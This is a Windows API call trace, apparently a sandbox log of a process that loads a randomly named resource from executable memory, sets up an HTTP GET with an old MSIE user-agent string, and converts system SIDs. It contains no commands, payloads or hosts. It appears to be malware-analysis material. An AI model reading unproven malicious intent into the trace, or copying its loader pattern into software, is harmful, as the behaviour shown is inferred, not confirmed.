[0100.354] IsWindowVisible (hWnd=0x301d8) returned 0
[0100.354] GetCurrentThreadId () returned 0xf78
[0100.354] VirtualQuery (in: lpAddress=0x2aa1668, lpBuffer=0x22f32c, dwLength=0x1c | out: lpBuffer=0x22f32c*(BaseAddress=0x2aa1000, AllocationBase=0x29e0000, AllocationProtect=0x40, RegionSize=0x52000, State=0x1000, Protect=0x40, Type=0x20000)) returned 0x1c
[0100.354] FindResourceA (hModule=0x29e0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2ae8990
[0100.354] FindResourceA (hModule=0x29e0000, lpName="TmarxvxinhhmA", lpType=0xa) returned 0x2ae8990
[0100.354] LoadResource (hModule=0x29e0000, hResInfo=0x2ae8990) returned 0x2aef044
[0100.354] SizeofResource (hModule=0x29e0000, hResInfo=0x2ae8990) returned 0xca5
[0100.354] LockResource (hResData=0x2aef044) returned 0x2aef044
[0100.354] GetCurrentThreadId () returned 0xf78
[0100.354] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22f0e0, fWinIni=0x0 | out: pvParam=0x22f0e0) returned 1
[0100.354] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22f0e0, fWinIni=0x0 | out: pvParam=0x22f0e0) returned 1
[0100.355] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22f0e0, fWinIni=0x0 | out: pvParam=0x22f0e0) returned 1
[0100.355] SystemParametersInfoA (in: uiAction=0x30, uiParam=0x0, pvParam=0x22f0e0, fWinIni=0x0 | out: pvParam=0x22f0e0) returned 1
[0100.356] GetDC (hWnd=0x0) returned 0xe010895
[0100.356] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0c4 | out: lptm=0x22f0c4) returned 1
[0100.356] CompareStringA (Locale=0x400, dwCmpFlags=0x1, lpString1="MS Sans Serif", cchCount1=13, lpString2="Default", cchCount2=7) returned 3
[0100.358] CreateFontIndirectA (lplf=0x22f07c) returned 0x100a0869
[0100.358] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.358] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0fc | out: lptm=0x22f0fc) returned 1
[0100.358] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.358] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.358] GetSystemMetrics (nIndex=6) returned 1
[0100.358] VirtualAlloc (lpAddress=0x2b04000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2b04000
[0100.359] GetDC (hWnd=0x0) returned 0xe010895
[0100.359] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0c4 | out: lptm=0x22f0c4) returned 1
[0100.359] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.359] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0fc | out: lptm=0x22f0fc) returned 1
[0100.359] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.359] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.359] GetSystemMetrics (nIndex=6) returned 1
[0100.359] GetDC (hWnd=0x0) returned 0xe010895
[0100.359] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0c4 | out: lptm=0x22f0c4) returned 1
[0100.359] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.359] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0fc | out: lptm=0x22f0fc) returned 1
[0100.359] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.359] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.359] GetSystemMetrics (nIndex=6) returned 1
[0100.360] GetDC (hWnd=0x0) returned 0xe010895
[0100.360] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0c4 | out: lptm=0x22f0c4) returned 1
[0100.360] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.360] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0fc | out: lptm=0x22f0fc) returned 1
[0100.360] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.360] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.360] GetSystemMetrics (nIndex=6) returned 1
[0100.360] GetDC (hWnd=0x0) returned 0xe010895
[0100.360] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0d8 | out: lptm=0x22f0d8) returned 1
[0100.360] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.360] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f110 | out: lptm=0x22f110) returned 1
[0100.361] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.361] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.361] GetSystemMetrics (nIndex=6) returned 1
[0100.361] GetDC (hWnd=0x0) returned 0xe010895
[0100.361] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22eddc | out: lptm=0x22eddc) returned 1
[0100.361] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.361] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22ee14 | out: lptm=0x22ee14) returned 1
[0100.361] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.361] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.361] GetSystemMetrics (nIndex=6) returned 1
[0100.361] GetDC (hWnd=0x0) returned 0xe010895
[0100.361] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0d8 | out: lptm=0x22f0d8) returned 1
[0100.361] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.361] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f110 | out: lptm=0x22f110) returned 1
[0100.361] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.361] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.362] GetSystemMetrics (nIndex=6) returned 1
[0100.362] GetDC (hWnd=0x0) returned 0xe010895
[0100.362] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22eddc | out: lptm=0x22eddc) returned 1
[0100.362] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.362] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22ee14 | out: lptm=0x22ee14) returned 1
[0100.362] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.362] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.362] GetSystemMetrics (nIndex=6) returned 1
[0100.362] GetDC (hWnd=0x0) returned 0xe010895
[0100.362] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0d8 | out: lptm=0x22f0d8) returned 1
[0100.362] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.362] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f110 | out: lptm=0x22f110) returned 1
[0100.362] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.362] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.362] GetSystemMetrics (nIndex=6) returned 1
[0100.362] GetDC (hWnd=0x0) returned 0xe010895
[0100.363] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22eddc | out: lptm=0x22eddc) returned 1
[0100.363] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.363] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22ee14 | out: lptm=0x22ee14) returned 1
[0100.363] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.363] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.363] GetSystemMetrics (nIndex=6) returned 1
[0100.363] GetDC (hWnd=0x0) returned 0xe010895
[0100.363] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0c4 | out: lptm=0x22f0c4) returned 1
[0100.363] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.363] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0fc | out: lptm=0x22f0fc) returned 1
[0100.363] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.363] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.363] GetSystemMetrics (nIndex=6) returned 1
[0100.364] GetDC (hWnd=0x0) returned 0xe010895
[0100.364] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0c4 | out: lptm=0x22f0c4) returned 1
[0100.364] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.364] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0fc | out: lptm=0x22f0fc) returned 1
[0100.364] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.364] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.364] GetSystemMetrics (nIndex=6) returned 1
[0100.364] GetDC (hWnd=0x0) returned 0xe010895
[0100.365] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0d8 | out: lptm=0x22f0d8) returned 1
[0100.365] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.365] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f110 | out: lptm=0x22f110) returned 1
[0100.365] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.365] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.365] GetSystemMetrics (nIndex=6) returned 1
[0100.365] GetDC (hWnd=0x0) returned 0xe010895
[0100.365] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22eddc | out: lptm=0x22eddc) returned 1
[0100.365] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.365] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22ee14 | out: lptm=0x22ee14) returned 1
[0100.365] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.365] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.365] GetSystemMetrics (nIndex=6) returned 1
[0100.365] GetDC (hWnd=0x0) returned 0xe010895
[0100.365] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0d8 | out: lptm=0x22f0d8) returned 1
[0100.365] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.365] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f110 | out: lptm=0x22f110) returned 1
[0100.365] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.366] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.366] GetSystemMetrics (nIndex=6) returned 1
[0100.366] GetDC (hWnd=0x0) returned 0xe010895
[0100.366] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22eddc | out: lptm=0x22eddc) returned 1
[0100.366] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.366] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22ee14 | out: lptm=0x22ee14) returned 1
[0100.366] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.366] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.366] GetSystemMetrics (nIndex=6) returned 1
[0100.366] GetDC (hWnd=0x0) returned 0xe010895
[0100.366] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0d8 | out: lptm=0x22f0d8) returned 1
[0100.366] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.366] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f110 | out: lptm=0x22f110) returned 1
[0100.366] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.367] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.367] GetSystemMetrics (nIndex=6) returned 1
[0100.367] GetDC (hWnd=0x0) returned 0xe010895
[0100.367] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22eddc | out: lptm=0x22eddc) returned 1
[0100.367] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.367] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22ee14 | out: lptm=0x22ee14) returned 1
[0100.367] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.367] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.367] GetSystemMetrics (nIndex=6) returned 1
[0100.367] GetDC (hWnd=0x0) returned 0xe010895
[0100.367] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0d8 | out: lptm=0x22f0d8) returned 1
[0100.367] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.367] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f110 | out: lptm=0x22f110) returned 1
[0100.367] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.367] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.367] GetSystemMetrics (nIndex=6) returned 1
[0100.367] GetDC (hWnd=0x0) returned 0xe010895
[0100.368] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22eddc | out: lptm=0x22eddc) returned 1
[0100.368] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.368] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22ee14 | out: lptm=0x22ee14) returned 1
[0100.368] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.368] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.368] GetSystemMetrics (nIndex=6) returned 1
[0100.368] GetDC (hWnd=0x0) returned 0xe010895
[0100.368] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0c4 | out: lptm=0x22f0c4) returned 1
[0100.368] SelectObject (hdc=0xe010895, h=0x100a0869) returned 0x18a002e
[0100.368] GetTextMetricsA (in: hdc=0xe010895, lptm=0x22f0fc | out: lptm=0x22f0fc) returned 1
[0100.368] SelectObject (hdc=0xe010895, h=0x18a002e) returned 0x100a0869
[0100.368] ReleaseDC (hWnd=0x0, hDC=0xe010895) returned 1
[0100.368] GetSystemMetrics (nIndex=6) returned 1
[0100.371] SysReAllocStringLen (in: pbstr=0x2b0f388*=0x0, psz="GET", len=0x3 | out: pbstr=0x2b0f388*="GET") returned 1
[0100.371] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.371] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.371] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.371] SysReAllocStringLen (in: pbstr=0x2b0f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2b0f388*="GET") returned 1
[0100.371] SysReAllocStringLen (in: pbstr=0x2b0f3b8*=0x0, psz="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)", len=0x39 | out: pbstr=0x2b0f3b8*="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1)") returned 1
[0100.371] InternetQueryOptionW (in: hInternet=0x0, dwOption=0x6, lpBuffer=0x22f160, lpdwBufferLength=0x22f164 | out: lpBuffer=0x22f160, lpdwBufferLength=0x22f164) returned 1
[0100.457] InternetSetOptionW (hInternet=0x0, dwOption=0x6, lpBuffer=0x22f160, dwBufferLength=0x4) returned 1
[0100.457] VirtualFree (lpAddress=0x2b10000, dwSize=0x4000, dwFreeType=0x4000) returned 1
[0100.457] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x2b06490, cbMultiByte=3, lpWideCharStr=0x22e098, cchWideChar=2047 | out: lpWideCharStr="GET") returned 3
[0100.457] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.457] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.457] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.457] SysReAllocStringLen (in: pbstr=0x2b0f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2b0f388*="GET") returned 1
[0100.458] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.458] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.458] CharUpperBuffW (in: lpsz="GET", cchLength=0x3 | out: lpsz="GET") returned 0x3
[0100.458] SysReAllocStringLen (in: pbstr=0x2b0f388*="GET", psz="GET", len=0x3 | out: pbstr=0x2b0f388*="GET") returned 1
[0100.464] GetTextExtentPoint32A (in: hdc=0x6010890, lpString="0", c=1, psizl=0x22f254 | out: psizl=0x22f254) returned 1
[0100.465] IsIconic (hWnd=0x301e8) returned 0
[0100.465] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f254 | out: lpRect=0x22f254) returned 1
[0100.465] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.465] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.465] IsIconic (hWnd=0x301e8) returned 0
[0100.465] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f19c | out: lpRect=0x22f19c) returned 1
[0100.465] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.465] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.465] IsIconic (hWnd=0x301e8) returned 0
[0100.465] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.465] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.465] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.465] IsIconic (hWnd=0x301e8) returned 0
[0100.465] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.465] FlatSB_SetScrollProp (param_1=0x301e8, index=0x200, newValue=0x0, param_4=0) returned 0
[0100.465] GetSysColor (nIndex=20) returned 0xffffff
[0100.465] FlatSB_SetScrollProp (param_1=0x301e8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0100.465] FlatSB_SetScrollInfo (param_1=0x301e8, code=0, psi=0x22f1aa, fRedraw=1) returned 0
[0100.465] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.465] IsIconic (hWnd=0x301e8) returned 0
[0100.465] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.465] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.465] IsIconic (hWnd=0x301e8) returned 0
[0100.465] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.466] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.466] IsIconic (hWnd=0x301e8) returned 0
[0100.466] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.466] FlatSB_SetScrollProp (param_1=0x301e8, index=0x100, newValue=0x0, param_4=0) returned 0
[0100.466] GetSysColor (nIndex=20) returned 0xffffff
[0100.466] FlatSB_SetScrollProp (param_1=0x301e8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0100.466] FlatSB_SetScrollInfo (param_1=0x301e8, code=1, psi=0x22f1aa, fRedraw=1) returned 0
[0100.466] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.466] IsIconic (hWnd=0x301e8) returned 0
[0100.466] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.466] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.466] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.466] IsIconic (hWnd=0x301e8) returned 0
[0100.466] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f19c | out: lpRect=0x22f19c) returned 1
[0100.466] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.466] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.466] IsIconic (hWnd=0x301e8) returned 0
[0100.466] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.466] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.466] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.466] IsIconic (hWnd=0x301e8) returned 0
[0100.466] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.466] FlatSB_SetScrollProp (param_1=0x301e8, index=0x200, newValue=0x0, param_4=0) returned 0
[0100.466] GetSysColor (nIndex=20) returned 0xffffff
[0100.466] FlatSB_SetScrollProp (param_1=0x301e8, index=0x80, newValue=0xffffff, param_4=0) returned 0
[0100.466] FlatSB_SetScrollInfo (param_1=0x301e8, code=0, psi=0x22f1aa, fRedraw=1) returned 0
[0100.467] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.467] IsIconic (hWnd=0x301e8) returned 0
[0100.467] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.467] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.467] IsIconic (hWnd=0x301e8) returned 0
[0100.467] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.467] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.467] IsIconic (hWnd=0x301e8) returned 0
[0100.467] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.467] FlatSB_SetScrollProp (param_1=0x301e8, index=0x100, newValue=0x0, param_4=0) returned 0
[0100.467] GetSysColor (nIndex=20) returned 0xffffff
[0100.467] FlatSB_SetScrollProp (param_1=0x301e8, index=0x40, newValue=0xffffff, param_4=0) returned 0
[0100.467] FlatSB_SetScrollInfo (param_1=0x301e8, code=1, psi=0x22f1aa, fRedraw=1) returned 0
[0100.467] GetWindowLongA (hWnd=0x301e8, nIndex=-16) returned 116326400
[0100.467] IsIconic (hWnd=0x301e8) returned 0
[0100.467] GetClientRect (in: hWnd=0x301e8, lpRect=0x22f16c | out: lpRect=0x22f16c) returned 1
[0100.467] GetCurrentThreadId () returned 0xf78
[0100.468] ConvertSidToStringSidA () returned 0x1
[0100.468] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0100.468] GetProcAddress (hModule=0x75370000, lpProcName="LocalFree") returned 0x753bca64
[0100.468] LocalFree (hMem=0x606f40) returned 0x0
[0100.468] LocalFree (hMem=0x5f2f90) returned 0x0
[0100.468] ConvertStringSidToSidA () returned 0x1
[0100.468] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b02914, pSourceSid=0x5f2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b02914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.468] IsValidSid (pSid=0x2b02914*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.468] ConvertSidToStringSidA () returned 0x1
[0100.468] LocalFree (hMem=0x606f40) returned 0x0
[0100.468] LocalFree (hMem=0x5f2f90) returned 0x0
[0100.468] ConvertStringSidToSidA () returned 0x1
[0100.468] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0702c, pSourceSid=0x5f2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b0702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.468] IsValidSid (pSid=0x2b0702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.468] ConvertSidToStringSidA () returned 0x1
[0100.468] LocalFree (hMem=0x606f40) returned 0x0
[0100.468] LocalFree (hMem=0x5f2f90) returned 0x0
[0100.468] ConvertStringSidToSidA () returned 0x1
[0100.468] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0f5a0, pSourceSid=0x5f2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2b0f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.468] IsValidSid (pSid=0x2b0f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0100.468] ConvertSidToStringSidA () returned 0x1
[0100.468] LocalFree (hMem=0x606f40) returned 0x0
[0100.468] LocalFree (hMem=0x5f2f90) returned 0x0
[0100.469] ConvertStringSidToSidA () returned 0x1
[0100.469] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0f614, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.469] IsValidSid (pSid=0x2b0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0100.469] ConvertSidToStringSidA () returned 0x1
[0100.469] LocalFree (hMem=0x606f58) returned 0x0
[0100.469] LocalFree (hMem=0x606f40) returned 0x0
[0100.469] ConvertStringSidToSidA () returned 0x1
[0100.469] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0f688, pSourceSid=0x606f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2b0f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0100.469] IsValidSid (pSid=0x2b0f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0100.469] ConvertSidToStringSidA () returned 0x1
[0100.469] LocalFree (hMem=0x606f58) returned 0x0
[0100.469] LocalFree (hMem=0x606f40) returned 0x0
[0100.469] ConvertStringSidToSidA () returned 0x1
[0100.469] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2b0f6fc, pSourceSid=0x606f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2b0f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0100.469] IsValidSid (pSid=0x2b0f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0100.469] ConvertSidToStringSidA () returned 0x1
[0100.469] LocalFree (hMem=0x5fc1c8) returned 0x0
[0100.469] LocalFree (hMem=0x606f58) returned 0x0
[0100.469] ConvertStringSidToSidA () returned 0x1
